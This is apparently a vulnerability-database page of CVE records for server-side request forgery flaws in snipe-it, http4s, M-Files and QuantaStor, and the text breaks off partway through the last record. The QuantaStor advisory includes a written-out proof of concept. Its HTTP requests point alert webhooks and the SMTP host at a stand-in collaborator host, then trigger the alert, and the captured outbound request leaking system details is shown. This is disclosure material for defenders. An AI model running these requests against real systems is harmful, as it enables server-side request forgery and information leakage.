CWE-918
Server-Side Request Forgery (SSRF)
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
CVE-2021-4075 (GCVE-0-2021-4075)
Vulnerability from cvelistv5 – Published: 2021-12-06 20:20 – Updated: 2024-08-03 17:16
VLAI
Title
Server-Side Request Forgery (SSRF) in snipe/snipe-it
Summary
snipe-it is vulnerable to Server-Side Request Forgery (SSRF)
Severity
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://huntr.dev/bounties/4386fd8b-8c80-42bb-87b… | x_refsource_CONFIRM |
| https://github.com/snipe/snipe-it/commit/4612b9e7… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| snipe | snipe/snipe-it |
Affected:
unspecified , < none
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:16:03.841Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/4386fd8b-8c80-42bb-87b8-b506c46597de"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/snipe/snipe-it/commit/4612b9e711b3ff5d2bcddbec5b18866d25f8e34e"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "snipe/snipe-it",
"vendor": "snipe",
"versions": [
{
"lessThan": "none",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "snipe-it is vulnerable to Server-Side Request Forgery (SSRF)"
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-12-06T20:20:10.000Z",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/4386fd8b-8c80-42bb-87b8-b506c46597de"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/snipe/snipe-it/commit/4612b9e711b3ff5d2bcddbec5b18866d25f8e34e"
}
],
"source": {
"advisory": "4386fd8b-8c80-42bb-87b8-b506c46597de",
"discovery": "EXTERNAL"
},
"title": "Server-Side Request Forgery (SSRF) in snipe/snipe-it",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-4075",
"STATE": "PUBLIC",
"TITLE": "Server-Side Request Forgery (SSRF) in snipe/snipe-it"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "snipe/snipe-it",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "none"
}
]
}
}
]
},
"vendor_name": "snipe"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "snipe-it is vulnerable to Server-Side Request Forgery (SSRF)"
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-918 Server-Side Request Forgery (SSRF)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://huntr.dev/bounties/4386fd8b-8c80-42bb-87b8-b506c46597de",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/4386fd8b-8c80-42bb-87b8-b506c46597de"
},
{
"name": "https://github.com/snipe/snipe-it/commit/4612b9e711b3ff5d2bcddbec5b18866d25f8e34e",
"refsource": "MISC",
"url": "https://github.com/snipe/snipe-it/commit/4612b9e711b3ff5d2bcddbec5b18866d25f8e34e"
}
]
},
"source": {
"advisory": "4386fd8b-8c80-42bb-87b8-b506c46597de",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-4075",
"datePublished": "2021-12-06T20:20:10.000Z",
"dateReserved": "2021-12-06T00:00:00.000Z",
"dateUpdated": "2024-08-03T17:16:03.841Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-41084 (GCVE-0-2021-41084)
Vulnerability from cvelistv5 – Published: 2021-09-21 17:20 – Updated: 2024-08-04 02:59
VLAI
Title
Response Splitting from unsanitized headers in http4s
Summary
http4s is an open source scala interface for HTTP. In affected versions http4s is vulnerable to response-splitting or request-splitting attacks when untrusted user input is used to create any of the following fields: Header names (`Header.name`å), Header values (`Header.value`), Status reason phrases (`Status.reason`), URI paths (`Uri.Path`), URI authority registered names (`URI.RegName`) (through 0.21). This issue has been resolved in versions 0.21.30, 0.22.5, 0.23.4, and 1.0.0-M27 perform the following. As a matter of practice http4s services and client applications should sanitize any user input in the aforementioned fields before returning a request or response to the backend. The carriage return, newline, and null characters are the most threatening.
Severity
8.7 (High)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://github.com/http4s/http4s/security/advisor… | x_refsource_CONFIRM |
| https://github.com/http4s/http4s/commit/d02007db1… | x_refsource_MISC |
| https://httpwg.org/http-core/draft-ietf-httpbis-s… | x_refsource_MISC |
| https://owasp.org/www-community/attacks/HTTP_Resp… | x_refsource_MISC |
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:59:31.504Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://owasp.org/www-community/attacks/HTTP_Response_Splitting"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "http4s",
"vendor": "http4s",
"versions": [
{
"status": "affected",
"version": "\u003c= 0.21.28"
},
{
"status": "affected",
"version": "\u003e= 0.22.0, \u003c 0.22.5"
},
{
"status": "affected",
"version": "\u003e= 0.23.0, \u003c 0.23.4"
},
{
"status": "affected",
"version": "\u003e= 1.0.0-M1, \u003c 1.0.0-M27"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "http4s is an open source scala interface for HTTP. In affected versions http4s is vulnerable to response-splitting or request-splitting attacks when untrusted user input is used to create any of the following fields: Header names (`Header.name`\u00e5), Header values (`Header.value`), Status reason phrases (`Status.reason`), URI paths (`Uri.Path`), URI authority registered names (`URI.RegName`) (through 0.21). This issue has been resolved in versions 0.21.30, 0.22.5, 0.23.4, and 1.0.0-M27 perform the following. As a matter of practice http4s services and client applications should sanitize any user input in the aforementioned fields before returning a request or response to the backend. The carriage return, newline, and null characters are the most threatening."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-09-21T17:20:14.000Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://owasp.org/www-community/attacks/HTTP_Response_Splitting"
}
],
"source": {
"advisory": "GHSA-5vcm-3xc3-w7x3",
"discovery": "UNKNOWN"
},
"title": "Response Splitting from unsanitized headers in http4s",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-41084",
"STATE": "PUBLIC",
"TITLE": "Response Splitting from unsanitized headers in http4s"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "http4s",
"version": {
"version_data": [
{
"version_value": "\u003c= 0.21.28"
},
{
"version_value": "\u003e= 0.22.0, \u003c 0.22.5"
},
{
"version_value": "\u003e= 0.23.0, \u003c 0.23.4"
},
{
"version_value": "\u003e= 1.0.0-M1, \u003c 1.0.0-M27"
}
]
}
}
]
},
"vendor_name": "http4s"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "http4s is an open source scala interface for HTTP. In affected versions http4s is vulnerable to response-splitting or request-splitting attacks when untrusted user input is used to create any of the following fields: Header names (`Header.name`\u00e5), Header values (`Header.value`), Status reason phrases (`Status.reason`), URI paths (`Uri.Path`), URI authority registered names (`URI.RegName`) (through 0.21). This issue has been resolved in versions 0.21.30, 0.22.5, 0.23.4, and 1.0.0-M27 perform the following. As a matter of practice http4s services and client applications should sanitize any user input in the aforementioned fields before returning a request or response to the backend. The carriage return, newline, and null characters are the most threatening."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-918: Server-Side Request Forgery (SSRF)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3",
"refsource": "CONFIRM",
"url": "https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3"
},
{
"name": "https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8",
"refsource": "MISC",
"url": "https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8"
},
{
"name": "https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values",
"refsource": "MISC",
"url": "https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values"
},
{
"name": "https://owasp.org/www-community/attacks/HTTP_Response_Splitting",
"refsource": "MISC",
"url": "https://owasp.org/www-community/attacks/HTTP_Response_Splitting"
}
]
},
"source": {
"advisory": "GHSA-5vcm-3xc3-w7x3",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-41084",
"datePublished": "2021-09-21T17:20:14.000Z",
"dateReserved": "2021-09-15T00:00:00.000Z",
"dateUpdated": "2024-08-04T02:59:31.504Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-41809 (GCVE-0-2021-41809)
Vulnerability from cvelistv5 – Published: 2022-01-18 16:51 – Updated: 2026-02-23 07:50
VLAI
Title
SSRF vulnerability in M-Files Server products with versions before 22.1.11017.1, allows requests from server.
Summary
SSRF vulnerability in M-Files Server products with versions before 22.1.11017.1, in a preview function allowed making queries from the server with certain document types referencing external entities.
Severity
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://www.m-files.com/about/trust-center/securi… | x_refsource_MISC |
| https://empower.m-files.com/security-advisories/C… | vendor-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| M-Files | M-Files Server |
Affected:
Online , < 22.1.11017.1
(custom)
|
Date Public
2022-01-16 22:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:22:24.325Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.m-files.com/about/trust-center/security-vulnerabilities/cve-2021-41809/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "M-Files Server",
"vendor": "M-Files",
"versions": [
{
"lessThan": "22.1.11017.1",
"status": "affected",
"version": "Online",
"versionType": "custom"
}
]
}
],
"datePublic": "2022-01-16T22:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSSRF vulnerability in M-Files Server products with versions before 22.1.11017.1, in a preview function allowed making queries from the server with certain document types referencing external entities.\u003c/p\u003e"
}
],
"value": "SSRF vulnerability in M-Files Server products with versions before 22.1.11017.1, in a preview function allowed making queries from the server with certain document types referencing external entities."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-23T07:50:32.583Z",
"orgId": "bcf7a16e-bfdc-46e4-9e42-4187da3f4410",
"shortName": "M-Files Corporation"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.m-files.com/about/trust-center/security-vulnerabilities/cve-2021-41809/"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://empower.m-files.com/security-advisories/CVE-2021-41809"
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "SSRF vulnerability in M-Files Server products with versions before 22.1.11017.1, allows requests from server.",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@m-files.com",
"DATE_PUBLIC": "2022-01-17T22:01:00.000Z",
"ID": "CVE-2021-41809",
"STATE": "PUBLIC",
"TITLE": "SSRF vulnerability in M-Files Server products with versions before 22.1.11017.1, allows requests from server."
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "M-Files Server",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "Online",
"version_value": "22.1.11017.1"
}
]
}
}
]
},
"vendor_name": "M-Files"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SSRF vulnerability in M-Files Server products with versions before 22.1.11017.1, in a preview function allowed making queries from the server with certain document types referencing external entities."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-918 Server-Side Request Forgery (SSRF)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.m-files.com/about/trust-center/security-vulnerabilities/cve-2021-41809/",
"refsource": "MISC",
"url": "https://www.m-files.com/about/trust-center/security-vulnerabilities/cve-2021-41809/"
}
]
},
"source": {
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "bcf7a16e-bfdc-46e4-9e42-4187da3f4410",
"assignerShortName": "M-Files Corporation",
"cveId": "CVE-2021-41809",
"datePublished": "2022-01-18T16:51:49.630Z",
"dateReserved": "2021-09-29T00:00:00.000Z",
"dateUpdated": "2026-02-23T07:50:32.583Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2021-42079 (GCVE-0-2021-42079)
Vulnerability from cvelistv5 – Published: 2023-07-10 06:29 – Updated: 2025-09-22 06:40
VLAI
Title
SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Summary
An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.
POC
Step 1: Prepare the SSRF with a request like this:
GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>
HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0
Step 2: Trigger this alert with this request
GET /qstorapi/alertRaise?title=test&message=test&severity=1
HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1
The post request received by <TARGET> looks like this:
{
### Python FLASK stuff ####
'endpoint': 'index',
'method': 'POST',
'cookies': ImmutableMultiDict([]),
### END Python FLASK stuff ####
'data': b'{
"attachments": [
{
"fallback": "[122] test / test.",
"color": "#aa2222",
"title": "[122] test",
"text": "test",
"fields": [
{
"title": "Alert Severity",
"value": "CRITICAL",
"short": false
}, {
"title": "Appliance",
"value": "quantastor (https://<HOSTNAME>)",
"short": true
}, {
"title": "System / Driver / Kernel Ver",
"value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
"short": false
}, {
"title": "System Startup",
"value": "Fri Aug 6 16-02-55 2021",
"short": true
}, {
"title": "SSID",
"value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
"short": true
},
],
"footer": "QuantaStor Call-home Alert",
"footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
"ts": 1628461774
}
],
"mrkdwn":true
}',
#### FLASK REQUEST STUFF #####
'headers': {
'Host': '<redacted>',
'User-Agent': 'curl/7.58.0',
'Accept': '*/*',
'Content-Type': 'application/json',
'Content-Length': '790'
},
'args': ImmutableMultiDict([]),
'form': ImmutableMultiDict([]),
'remote_addr': '217.103.63.173',
'path': '/payload/58',
'whois_ip': 'TNF-AS, NL'
}
#### END FLASK REQUEST STUFF #####
Severity
6.2 (Medium)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://www.wbsec.nl/osnexus | third-party-advisorytechnical-description |
| https://cisrt.divd.nl/DIVD-2021-00020/ | third-party-advisoryexploittechnical-description |
| https://www.osnexus.com/products/software-defined… | product |
| https://csirt.divd.nl/CVE-2021-42079 | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| OSNEXUS | QuantaStor |
Affected:
0 , < 6.0.0.355
(semver)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:22:25.855Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.divd.nl/DIVD-2021-00020"
},
{
"tags": [
"product",
"x_transferred"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-42079"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-42079",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-04T20:06:08.530050Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T20:06:17.817Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://www.osnexus.com/downloads",
"defaultStatus": "unknown",
"platforms": [
"Windows",
"Linux"
],
"product": "QuantaStor",
"vendor": "OSNEXUS",
"versions": [
{
"lessThan": "6.0.0.355",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Wietse Boonstra (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Frank Breedijk (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Pasman (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Gevers (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Max van der Horst (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "C\u00e9listine Oosting (DIVD)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003eStep 1: Prepare the SSRF with a request like this:\u003cbr\u003e\u003cbr\u003e\u003ctt\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026amp;smtpServerIpAddress=BURPCOLLABHOST\u0026amp;smtpServerPort=25\u0026amp;smtpUsername=a\u0026amp;smtpPassword=1\u0026amp;smtpAuthType=1\u0026amp;customerSupportEmailAddress=1\u0026amp;poolFreeSpaceWarningThreshold=1\u0026amp;poolFreeSpaceAlertThreshold=1\u0026amp;poolFreeSpaceCriticalAlertThreshold=1\u0026amp;pagerDutyServiceKey=1\u0026amp;slackWebhookUrl=\u003c/span\u003ehttp://\u0026lt;target\u0026gt;\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e\u0026amp;enableAlertTypes\u0026amp;enableAlertTypes=1\u0026amp;disableAlertTypes=1\u0026amp;pauseAlertTypes=1\u0026amp;mattermostWebhookUrl=\u003c/span\u003ehttp://\u0026lt;TARGET\u0026gt;\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eHTTP/1.1\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\n\u003cbr\u003eAccept: */*\nAccept-Language: en\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\u003cbr\u003e\nConnection: close\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\n\u003cbr\u003eContent-Length: 0\u003c/span\u003e\u003c/tt\u003e\u003cbr\u003e\u003ctt\u003e\u003cbr\u003eStep 2: Trigger this alert with this request\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eGET /qstorapi/alertRaise?title=test\u0026amp;message=test\u0026amp;severity=1 \u003cbr\u003eHTTP/1.1\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\n\u003cbr\u003eAccept: */*\n\u003cbr\u003eAccept-Language: en\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\u003cbr\u003eConnection: close\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\n\u003cbr\u003eContent-Length: 1\u003cbr\u003e\u003cbr\u003e\u003c/span\u003e\u003c/tt\u003eThe post request received by \u0026lt;TARGET\u0026gt; looks like this:\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e{\u003cbr\u003e\u2003\n### Python FLASK stuff ####\n\u003cbr\u003e\u2003\u0027endpoint\u0027: \u0027index\u0027, \u003cbr\u003e\u2003\n\u0027method\u0027: \u0027POST\u0027, \u003cbr\u003e\u2003\n\u0027cookies\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\n### END Python FLASK stuff ####\n\u003cbr\u003e\u2003\n\u0027data\u0027: b\u0027{ \u003cbr\u003e\u2003\u2003\"attachments\": [ \u003cbr\u003e\u2003\u2003\u2003{\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"text\": \"test\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"fields\": [ \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n \u0026nbsp; \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n \u0026nbsp; \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u0026nbsp; \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (\u003c/span\u003ehttps://\u0026lt;HOSTNAME\u0026gt;\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e)\",\n \u0026nbsp; \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false 